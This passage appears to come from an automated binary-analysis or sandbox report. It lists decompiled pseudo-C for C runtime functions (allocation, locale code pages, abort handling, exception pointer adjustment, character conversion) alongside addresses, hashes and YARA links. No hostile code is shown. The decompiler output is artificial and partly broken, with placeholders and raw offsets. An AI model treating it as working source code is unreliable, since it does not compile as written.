							goto L14;
						}
						E00C4B5B2(_t6, _t31);
						 *((intOrPtr*)(E00C44C63(__eflags))) = 0xc;
						goto L12;
					} else {
						E00C44444(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00C45B0A(__ebx, __edx, __edi, _a8);
				}
			}

0x00c4f5f3
0x00c4f601
0x00c4f604
0x00c4f606
0x00c4f615
0x00c4f648
0x00c4f648
0x00c4f64b
0x00000000
0x00000000
0x00c4f618
0x00c4f61a
0x00c4f61c
0x00c4f61c
0x00c4f61c
0x00c4f629
0x00c4f62f
0x00c4f631
0x00c4f633
0x00c4f693
0x00c4f693
0x00c4f635
0x00c4f635
0x00c4f63b
0x00c4f67d
0x00c4f691
0x00000000
0x00c4f63d
0x00c4f644
0x00c4f646
0x00c4f665
0x00c4f679
0x00c4f65f
0x00c4f65f
0x00c4f65f
0x00000000
0x00000000
0x00000000
0x00c4f646
0x00c4f63b
0x00000000
0x00c4f661
0x00c4f64e
0x00c4f659
0x00000000
0x00c4f608
0x00c4f60b
0x00c4f611
0x00c4f611
0x00c4f662
0x00c4f664
0x00c4f5f5
0x00c4f5ff
0x00c4f5ff

APIs

_malloc.LIBCMT ref: 00C4F5F8

Part of subcall function 00C45B0A: __FF_MSGBANNER.LIBCMT ref: 00C45B21
Part of subcall function 00C45B0A: __NMSG_WRITE.LIBCMT ref: 00C45B28
Part of subcall function 00C45B0A: HeapAlloc.KERNEL32(00F70000,00000000,00000001,00000000,?,00000000,?,00C47CF2,00000000,00000000,00000000,?,?,00C46B99,00000018,00C5D290), ref: 00C45B4D

_free.LIBCMT ref: 00C4F60B

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 9d24858c5ff64c2b9d0c6d212c90a261764275a499c75527bd0af0335cbdf890
Instruction ID: c36d5b2079d567ebe87d2db6e984f31734f7c3cfe93bc47258641190733d4ec4
Opcode Fuzzy Hash: 9d24858c5ff64c2b9d0c6d212c90a261764275a499c75527bd0af0335cbdf890
Instruction Fuzzy Hash: 56110A31905612ABCF243F74AC85B9D3B98BF00370F21843DF8159A171DF308D819A94

Uniqueness

Uniqueness Score: -1.00%

Function 00C42D81, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00C42D81(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t66;
				signed int _t74;
				signed int _t76;
				void* _t78;
				signed int _t80;
				signed int _t86;
				signed int _t89;
				intOrPtr _t92;
				signed int _t104;
				signed int* _t105;
				signed int* _t106;
				void* _t108;
				signed int _t110;
				void* _t111;
				void* _t112;

				_push(0x30);
				E00C456BB(E00C56E47, __ebx, __edi, __esi);
				_t108 = __ecx;
				_t86 =  *(_t111 + 8);
				_t110 = __esi | 0xffffffff;
				if(_t86 != _t110) {
					_t89 =  *( *(__ecx + 0x20));
					__eflags = _t89;
					if(_t89 == 0) {
						L6:
						__eflags =  *(_t108 + 0x50);
						if( *(_t108 + 0x50) == 0) {
							L34:
							L35:
							return E00C45679(_t86, _t108, _t110);
						}
						E00C42C12(_t108);
						__eflags =  *(_t108 + 0x40);
						if(__eflags != 0) {
							 *(_t111 - 0x34) = _t86;
							 *((intOrPtr*)(_t111 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t111 - 0x18)) = 0;
							 *(_t111 - 0x28) = 0;
							E00C41E10(_t111 - 0x28, 8, 0);
							_t14 = _t111 - 4;
							 *_t14 =  *(_t111 - 4) & 0x00000000;
							__eflags =  *_t14;
							while(1) {
								L11:
								_t66 =  *(_t111 - 0x28);
								_t92 =  *((intOrPtr*)(_t111 - 0x14));
								 *(_t111 - 0x30) = _t66;
								while(1) {
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										_t66 = _t111 - 0x28;
									}
									 *(_t111 - 0x2c) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x30) = _t111 - 0x28;
									}
									_t74 =  *((intOrPtr*)( *( *(_t108 + 0x40)) + 0x1c))(_t108 + 0x48, _t111 - 0x34, _t111 - 0x33, _t111 - 0x3c,  *(_t111 - 0x30),  *((intOrPtr*)(_t111 - 0x18)) +  *(_t111 - 0x2c), _t111 - 0x38);
									_t86 =  *(_t111 + 8);
									__eflags = _t74;
									if(_t74 < 0) {
										break;
									}
									__eflags = _t74 - 1;
									if(_t74 > 1) {
										__eflags = _t74 - 3;
										if(__eflags != 0) {
											break;
										}
										_t76 = E00C42682(__eflags,  *(_t111 - 0x34),  *(_t108 + 0x50));
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										L32:
										_t110 = _t86;
										break;
									}
									_t92 =  *((intOrPtr*)(_t111 - 0x14));
									_t66 =  *(_t111 - 0x28);
									 *(_t111 - 0x30) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x2c) = _t111 - 0x28;
									} else {
										 *(_t111 - 0x2c) = _t66;
									}
									_t104 =  *((intOrPtr*)(_t111 - 0x38)) -  *(_t111 - 0x2c);
									__eflags = _t104;
									 *(_t111 - 0x2c) = _t104;
									if(_t104 == 0) {
										L26:
										__eflags =  *((intOrPtr*)(_t111 - 0x3c)) - _t111 - 0x34;
										_t86 =  *(_t111 + 8);
										 *((char*)(_t108 + 0x45)) = 1;
										if( *((intOrPtr*)(_t111 - 0x3c)) != _t111 - 0x34) {
											goto L32;
										}
										__eflags = _t104;
										if(_t104 != 0) {
											continue;
										}
										__eflags =  *((intOrPtr*)(_t111 - 0x18)) - 0x20;
										if( *((intOrPtr*)(_t111 - 0x18)) >= 0x20) {
											break;
										}
										E00C41BF0(_t66, _t111 - 0x28, 8, _t104);
										goto L11;
									} else {
										__eflags = _t92 - 0x10;
										if(__eflags < 0) {
											_t66 = _t111 - 0x28;
										}
										_push( *(_t108 + 0x50));
										_push(_t104);
										_push(1);
										_push(_t66);
										_t78 = E00C466DD(_t86, _t104, _t108, _t110, __eflags);
										_t104 =  *(_t111 - 0x2c);
										_t112 = _t112 + 0x10;
										__eflags = _t104 - _t78;
										if(_t104 != _t78) {
											break;
										} else {
											_t66 =  *(_t111 - 0x28);
											_t92 =  *((intOrPtr*)(_t111 - 0x14));
											 *(_t111 - 0x30) = _t66;
											goto L26;
										}
									}
								}
								E00C41AC0(_t111 - 0x28);
								goto L34;
							}
						}
						_t80 = E00C42682(__eflags, _t86,  *(_t108 + 0x50));
						__eflags = _t80;
						if(_t80 == 0) {
							_t86 = _t110;
						}
						L5:
						goto L35;
					}
					_t105 =  *(__ecx + 0x30);
					__eflags = _t89 -  *_t105 + _t89;
					if(_t89 >=  *_t105 + _t89) {
						goto L6;
					}
					 *_t105 =  *_t105 - 1;
					__eflags =  *_t105;
					_t106 =  *(__ecx + 0x20);
					_t110 =  *_t106;
					 *_t106 = _t110 + 1;
					 *_t110 = _t86;
					goto L5;
				}
				goto L35;
			}

0x00c42d81
0x00c42d88
0x00c42d8d
0x00c42d8f
0x00c42d92
0x00c42d97
0x00c42da3
0x00c42da5
0x00c42da7
0x00c42dc9
0x00c42dc9
0x00c42dcd
0x00c42f00
0x00c42f02
0x00c42f07
0x00c42f07
0x00c42dd5
0x00c42ddc
0x00c42ddf
0x00c42dfa
0x00c42dfd
0x00c42e04
0x00c42e07
0x00c42e0a
0x00c42e0f
0x00c42e0f
0x00c42e0f
0x00c42e13
0x00c42e13
0x00c42e13
0x00c42e16
0x00c42e19
0x00c42e1c
0x00c42e1c
0x00c42e1f
0x00c42e21
0x00c42e21
0x00c42e24
0x00c42e27
0x00c42e2a
0x00c42e2f
0x00c42e2f
0x00c42e55
0x00c42e58
0x00c42e5b
0x00c42e5d
0x00000000
0x00000000
0x00c42e63
0x00c42e66
0x00c42ee0
0x00c42ee3
0x00000000
0x00000000
0x00c42eeb
0x00c42ef2
0x00c42ef4
0x00000000
0x00000000
0x00c42ef6
0x00c42ef6
0x00000000
0x00c42ef6
0x00c42e68
0x00c42e6b
0x00c42e6e
0x00c42e71
0x00c42e74
0x00c42e7e
0x00c42e76
0x00c42e76
0x00c42e76
0x00c42e84
0x00c42e84
0x00c42e87
0x00c42e8a
0x00c42eb3
0x00c42eb6
0x00c42eb9
0x00c42ebc
0x00c42ec0
0x00000000
0x00000000
0x00c42ec2
0x00c42ec4
0x00000000
0x00000000
0x00c42eca
0x00c42ece
0x00000000
0x00000000
0x00c42ed6
0x00000000
0x00c42e8c
0x00c42e8c
0x00c42e8f
0x00c42e91
0x00c42e91
0x00c42e94
0x00c42e97
0x00c42e98
0x00c42e9a
0x00c42e9b
0x00c42ea0
0x00c42ea3
0x00c42ea6
0x00c42ea8
0x00000000
0x00c42eaa
0x00c42eaa
0x00c42ead
0x00c42eb0
0x00000000
0x00c42eb0
0x00c42ea8
0x00c42e8a
0x00c42efb
0x00000000
0x00c42efb
0x00c42e13
0x00c42de5
0x00c42dec
0x00c42dee
0x00c42df0
0x00c42df0
0x00c42dc2
0x00000000
0x00c42dc2
0x00c42da9
0x00c42db0
0x00c42db2
0x00000000
0x00000000
0x00c42db4
0x00c42db4
0x00c42db6
0x00c42db9
0x00c42dbe
0x00c42dc0
0x00000000
0x00c42dc0
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00C42D88

Strings

, xrefs: 00C42ECA

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_
String ID:
API String ID: 2427045233-3916222277
Opcode ID: 41042b804684bc5e6dae02209e193ee0944b8087d4f184a1af60545ac099afa2
Instruction ID: 3e7ab39accb8c0cd27942560faf395f4a6cc91a6717b8646903ea40c9ec60bf2
Opcode Fuzzy Hash: 41042b804684bc5e6dae02209e193ee0944b8087d4f184a1af60545ac099afa2
Instruction Fuzzy Hash: 2C516F75E0020AAFDF14DFA4C482AEDBBB5FF18311F944529F911A7641DB30AA85DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C52A3B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C52A3B(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00C52502(_t28, ?str?) != 0) {
					if(E00C52502(_t28, ?str?) != 0) {
						return E00C5434E(_t28);
					}
					if(E00C4F560(_a8 + 0x250, _a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E00C4F560(_a8 + 0x250, _a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

0x00c52a3f
0x00c52a44
0x00c52a6c
0x00000000
0x00c52a9a
0x00c52a8c
0x00c52abd
0x00000000
0x00c52abd
0x00000000
0x00c52a8e
0x00c52abb
0x00000000
0x00000000
0x00c52ac1
0x00c52ac6
0x00c52aca
0x00c52aca
0x00c52a93

APIs

_wcscmp.LIBCMT ref: 00C52A52
_wcscmp.LIBCMT ref: 00C52A63

Part of subcall function 00C4F560: GetLocaleInfoEx.KERNEL32(00000000,00000000,00000002,?,?,00C4B511,?,?,?,00000002,00000000,00000000,00000000), ref: 00C4F56F

Strings

OCP, xrefs: 00C52A5D
ACP, xrefs: 00C52A4C

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _wcscmp$InfoLocale
String ID: ACP$OCP
API String ID: 2268238039-711371036
Opcode ID: c921d3330a72fa6565510f4c3dde909198949d59c73a5e10c15f8becfca9f3f0
Instruction ID: a01ff346bce4237bb64160e3061d1828a383b2c6c55d55ffe54d5ed7fefdbc29
Opcode Fuzzy Hash: c921d3330a72fa6565510f4c3dde909198949d59c73a5e10c15f8becfca9f3f0
Instruction Fuzzy Hash: 0701963D24071666EB20EA19DC42FEA33C89F02756F044425FD19E6181F730D7C8729C

Uniqueness

Uniqueness Score: -1.00%

Function 00C445BC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00C445BC(signed int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, intOrPtr* _a4) {
				signed int _v0;
				signed int _t16;
				void* _t18;
				void* _t19;
				signed int _t21;
				signed int _t22;
				void* _t28;
				intOrPtr* _t29;
				void* _t32;
				signed int _t33;
				void* _t34;
				void* _t35;

				_t35 = __esi;
				_t34 = __edi;
				_t32 = __edx;
				_t28 = __ebx;
				_t16 = __eax ^ 0x00cc6150;
				__imp__DecodePointer();
				if(_t16 != 0) {
					 *_t16();
				}
				_push(0x19);
				E00C4B1A2(_t28, _t32, _t34, _t35);
				_t18 = E00C480B8(0, 1);
				_t19 = E00C5022A(_t18);
				_t41 = _t19;
				if(_t19 != 0) {
					_push(0x16);
					E00C50253(_t28, _t34, _t35, _t41);
				}
				if(( *0xc5f9d0 & 0x00000002) != 0) {
					if(IsProcessorFeaturePresent(0x17) != 0) {
						_push(7);
						asm("int 0x29");
					}
					E00C49A7F(_t28, _t32, _t35, 3, 0x40000015, 1);
				}
				E00C4AD39(3);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t33 = _v0;
				_t29 = _a4;
				if((_t33 & 0x00000003) != 0) {
					__eflags = _t33 & 0x00000001;
					if((_t33 & 0x00000001) == 0) {
						L26:
						_t21 =  *_t33;
						_t33 = _t33 + 2;
						__eflags = _t21 -  *_t29;
						if(_t21 !=  *_t29) {
							goto L21;
						} else {
							__eflags = _t21;
							if(_t21 == 0) {
								goto L20;
							} else {
								__eflags = _t21 -  *((intOrPtr*)(_t29 + 1));
								if(_t21 !=  *((intOrPtr*)(_t29 + 1))) {
									goto L21;
								} else {
									__eflags = _t21;
									if(_t21 == 0) {
										goto L20;
									} else {
										_t29 = _t29 + 2;
										goto L11;
									}
								}
							}
						}
					} else {
						_t21 =  *_t33;
						_t33 = _t33 + 1;
						__eflags = _t21 -  *_t29;
						if(_t21 !=  *_t29) {
							goto L21;
						} else {
							_t29 = _t29 + 1;
							__eflags = _t21;
							if(_t21 == 0) {
								goto L20;
							} else {
								__eflags = _t33 & 0x00000002;
								if((_t33 & 0x00000002) == 0) {
									goto L11;
								} else {
									goto L26;
								}
							}
						}
					}
				} else {
					while(1) {
						L11:
						_t21 =  *_t33;
						if(_t21 !=  *_t29) {
							break;
						}
						if(_t21 == 0) {
							L20:
							return 0;
						} else {
							if(_t21 !=  *((intOrPtr*)(_t29 + 1))) {
								break;
							} else {
								if(_t21 == 0) {
									goto L20;
								} else {
									_t21 = _t21 >> 0x10;
									if(_t21 !=  *((intOrPtr*)(_t29 + 2))) {
										break;
									} else {
										if(_t21 == 0) {
											goto L20;
										} else {
											if(_t21 !=  *((intOrPtr*)(_t29 + 3))) {
												break;
											} else {
												_t29 = _t29 + 4;
												_t33 = _t33 + 4;
												if(_t21 != 0) {
													continue;
												} else {
													goto L20;
												}
											}
										}
									}
								}
							}
						}
						goto L31;
					}
					L21:
					asm("sbb eax, eax");
					_t22 = _t21 | 0x00000001;
					__eflags = _t22;
					return _t22;
				}
				L31:
			}

0x00c445bc
0x00c445bc
0x00c445bc
0x00c445bc
0x00c445bc
0x00c445c1
0x00c445c9
0x00c445cb
0x00c445cb
0x00c445cd
0x00c445cf
0x00c445d8
0x00c480d7
0x00c480dc
0x00c480de
0x00c480e0
0x00c480e2
0x00c480e7
0x00c480ef
0x00c480fa
0x00c480fc
0x00c480ff
0x00c480ff
0x00c4810a
0x00c4810f
0x00c48114
0x00c48119
0x00c4811a
0x00c4811b
0x00c4811c
0x00c4811d
0x00c4811e
0x00c4811f
0x00c48120
0x00c48124
0x00c4812e
0x00c48170
0x00c48176
0x00c48190
0x00c48190
0x00c48193
0x00c48196
0x00c48198
0x00000000
0x00c4819a
0x00c4819a
0x00c4819c
0x00000000
0x00c4819e
0x00c4819e
0x00c481a1
0x00000000
0x00c481a3
0x00c481a3
0x00c481a5
0x00000000
0x00c481a7
0x00c481a7
0x00000000
0x00c481a7
0x00c481a5
0x00c481a1
0x00c4819c
0x00c48178
0x00c48178
0x00c4817a
0x00c4817d
0x00c4817f
0x00000000
0x00c48181
0x00c48181
0x00c48184
0x00c48186
0x00000000
0x00c48188
0x00c48188
0x00c4818e
0x00000000
0x00000000
0x00000000
0x00000000
0x00c4818e
0x00c48186
0x00c4817f
0x00c48130
0x00c48130
0x00c48130
0x00c48130
0x00c48134
0x00000000
0x00000000
0x00c48138
0x00c48160
0x00c48162
0x00c4813a
0x00c4813d
0x00000000
0x00c4813f
0x00c48141
0x00000000
0x00c48143
0x00c48143
0x00c48149
0x00000000
0x00c4814b
0x00c4814d
0x00000000
0x00c4814f
0x00c48152
0x00000000
0x00c48154
0x00c48154
0x00c48157
0x00c4815c
0x00000000
0x00000000
0x00000000
0x00000000
0x00c4815c
0x00c48152
0x00c4814d
0x00c48149
0x00c48141
0x00c4813d
0x00000000
0x00c48138
0x00c48168
0x00c48168
0x00c4816a
0x00c4816a
0x00c4816d
0x00c4816d
0x00000000

APIs

DecodePointer.KERNEL32 ref: 00C445C1
__NMSG_WRITE.LIBCMT ref: 00C445CF
__set_abort_behavior.LIBCMT ref: 00C445D8

Strings

EnG, xrefs: 00C445BC

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DecodePointer__set_abort_behavior
String ID: EnG
API String ID: 4109001881-1321786439
Opcode ID: 69bfa1cb9c7d37a7701532a6799d10d52d3e3f8985339884d1fa59581926df54
Instruction ID: 63b02ddd0aa3583cc4f980c62c35c6e6630205befeaa77206b56d8d9f9158a9d
Opcode Fuzzy Hash: 69bfa1cb9c7d37a7701532a6799d10d52d3e3f8985339884d1fa59581926df54
Instruction Fuzzy Hash: E6C04CB17A42005AFE1037E15D57B6D1551AB44B46F584425BA15E41D1EE91C94C7063

Uniqueness

Uniqueness Score: -1.00%

Function 00C475E3, Relevance: 6.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00C475E3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t38;
				intOrPtr _t39;
				intOrPtr _t62;
				signed int _t63;
				signed char _t65;
				signed char _t66;
				intOrPtr _t88;
				signed char _t89;
				intOrPtr* _t91;
				signed char* _t94;
				intOrPtr _t95;
				void* _t96;

				_push(0xc);
				_push(0xc5d398);
				E00C4AF50(__ebx, __edi, __esi);
				_t62 = 0;
				_t38 =  *(_t96 + 0x10);
				_t65 = _t38[4];
				if(_t65 == 0 ||  *((intOrPtr*)(_t65 + 8)) == 0) {
					L27:
					_t39 = 0;
				} else {
					_t66 = _t38[8];
					if(_t66 != 0 || ( *_t38 & 0x80000000) != 0) {
						_t89 =  *_t38;
						_t91 =  *((intOrPtr*)(_t96 + 0xc));
						if(_t89 >= 0) {
							_t91 = _t91 + 0xc + _t66;
						}
						 *((intOrPtr*)(_t96 - 4)) = _t62;
						_push(1);
						if((_t89 & 0x00000008) == 0) {
							_t94 =  *(_t96 + 0x14);
							_t17 =  *((intOrPtr*)(_t96 + 8)) + 0x18; // 0x36b4e8
							_push( *_t17);
							if(( *_t94 & 0x00000001) == 0) {
								if(_t94[0x18] != _t62) {
									if(E00C4F4A1() == 0) {
										goto L25;
									} else {
										_push(1);
										if(E00C4F4A1(_t91) == 0 || E00C4F4A1(_t94[0x18]) == 0) {
											goto L25;
										} else {
											_t63 = 0;
											_t62 = (_t63 & 0xffffff00 | ( *_t94 & 0x00000004) != 0x00000000) + 1;
											 *((intOrPtr*)(_t96 - 0x1c)) = _t62;
										}
									}
								} else {
									if(E00C4F4A1() == 0) {
										goto L25;
									} else {
										_push(1);
										if(E00C4F4A1(_t91) == 0) {
											goto L25;
										} else {
											_t29 =  *((intOrPtr*)(_t96 + 8)) + 0x18; // 0x36b4e8
											E00C43E00(_t91, E00C47530( *_t29,  &(_t94[8])), _t94[0x14]);
										}
									}
								}
							} else {
								if(E00C4F4A1() == 0) {
									goto L25;
								} else {
									_push(1);
									if(E00C4F4A1(_t91) == 0) {
										goto L25;
									} else {
										_t22 =  *((intOrPtr*)(_t96 + 8)) + 0x18; // 0x36b4e8
										E00C43E00(_t91,  *_t22, _t94[0x14]);
										if(_t94[0x14] == 4 &&  *_t91 != 0) {
											_push( &(_t94[8]));
											_push( *_t91);
											goto L10;
										}
									}
								}
							}
						} else {
							_t95 =  *((intOrPtr*)(_t96 + 8));
							_t12 = _t95 + 0x18; // 0x36b4e8
							if(E00C4F4A1( *_t12) == 0) {
								L25:
								E00C4D94C();
							} else {
								_push(1);
								if(E00C4F4A1(_t91) == 0) {
									goto L25;
								} else {
									_t13 = _t95 + 0x18; // 0x36b4e8
									_t88 =  *_t13;
									 *_t91 = _t88;
									_push( &(( *(_t96 + 0x14))[8]));
									_push(_t88);
									L10:
									 *_t91 = E00C47530();
								}
							}
						}
						 *((intOrPtr*)(_t96 - 4)) = 0xfffffffe;
						_t39 = _t62;
					} else {
						goto L27;
					}
				}
				return E00C4AF95(_t39);
			}

0x00c475e3
0x00c475e5
0x00c475ea
0x00c475ef
0x00c475f1
0x00c475f4
0x00c475f9
0x00c47760
0x00c47760
0x00c47608
0x00c47608
0x00c4760d
0x00c4761b
0x00c4761d
0x00c47622
0x00c47627
0x00c47627
0x00c47629
0x00c4762c
0x00c47631
0x00c47675
0x00c4767b
0x00c4767b
0x00c47681
0x00c476d4
0x00c47718
0x00000000
0x00c4771a
0x00c4771a
0x00c47726
0x00000000
0x00c47735
0x00c4773a
0x00c4773e
0x00c4773f
0x00c4773f
0x00c47726
0x00c476d6
0x00c476df
0x00000000
0x00c476e1
0x00c476e1
0x00c476ed
0x00000000
0x00c476ef
0x00c476f9
0x00c47705
0x00c4770a
0x00c476ed
0x00c476df
0x00c47683
0x00c4768c
0x00000000
0x00c47692
0x00c47692
0x00c4769e
0x00000000
0x00c476a4
0x00c476aa
0x00c476ae
0x00c476ba
0x00c476cc
0x00c476cd
0x00000000
0x00c476cd
0x00c476ba
0x00c4769e
0x00c4768c
0x00c47633
0x00c47633
0x00c47636
0x00c47642
0x00c47744
0x00c47744
0x00c47648
0x00c47648
0x00c47654
0x00000000
0x00c4765a
0x00c4765a
0x00c4765a
0x00c4765d
0x00c47665
0x00c47666
0x00c47667
0x00c4766e
0x00c4766e
0x00c47654
0x00c47642
0x00c47749
0x00c47750
0x00000000
0x00000000
0x00000000
0x00c4760d
0x00c47767

APIs

___AdjustPointer.LIBCMT ref: 00C47667
_memmove.LIBCMT ref: 00C476AE
___AdjustPointer.LIBCMT ref: 00C476FC
_memmove.LIBCMT ref: 00C47705

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AdjustPointer_memmove
String ID:
API String ID: 1721217611-0
Opcode ID: afa4bec94792139cd68b9ffa52e7200a03be730072a38d38a3f0ebd1d7e39d28
Instruction ID: eec19f18ddbe2627aff9a4af19b384f52d0d9c2fa3ea33be47c2d251c7a144cd
Opcode Fuzzy Hash: afa4bec94792139cd68b9ffa52e7200a03be730072a38d38a3f0ebd1d7e39d28
Instruction Fuzzy Hash: 5441293560CB039EEB269F15E882B6637E5BF90334F24422DF8119A1D2DF31E991EA51

Uniqueness

Uniqueness Score: -1.00%

Function 00C53031, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C53031(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t60;
				char* _t63;

				_t63 = _a8;
				if(_t63 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t63 != 0) {
					E00C44CB7(_t50,  &_v20, __edx, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00C501E3( *_t63 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t60 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t63, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t60;
							}
							L20:
							_t44 = E00C44C63(__eflags);
							_t60 = _t60 | 0xffffffff;
							__eflags = _t60;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t60 = _v20;
						__eflags =  *(_t60 + 0x74) - 1;
						if( *(_t60 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t60 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t63[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t60 =  *(_t60 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t60 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t60 + 4), 9, _t63,  *(_t60 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t60 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t63 & 0x000000ff;
					}
					_t60 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x00c53039
0x00c5303e
0x00c53058
0x00000000
0x00c53058
0x00c53040
0x00c53045
0x00000000
0x00000000
0x00c5304a
0x00c53065
0x00c5306a
0x00c5306d
0x00c53074
0x00c53093
0x00c5309a
0x00c5309c
0x00c530e0
0x00c530e8
0x00c530fd
0x00c530ff
0x00c5310f
0x00c5310f
0x00c53113
0x00c53115
0x00c53118
0x00c53118
0x00c53118
0x00c53118
0x00000000
0x00c5311e
0x00c53101
0x00c53101
0x00c53106
0x00c53106
0x00c53109
0x00000000
0x00c53109
0x00c5309e
0x00c530a1
0x00c530a5
0x00c530ce
0x00c530ce
0x00c530d1
0x00c530d1
0x00000000
0x00000000
0x00c530d3
0x00c530d7
0x00000000
0x00000000
0x00c530d9
0x00c530d9
0x00000000
0x00c530d9
0x00c530a7
0x00c530aa
0x00000000
0x00000000
0x00c530ae
0x00c530c1
0x00c530c7
0x00c530ca
0x00c530cc
0x00000000
0x00000000
0x00000000
0x00c530cc
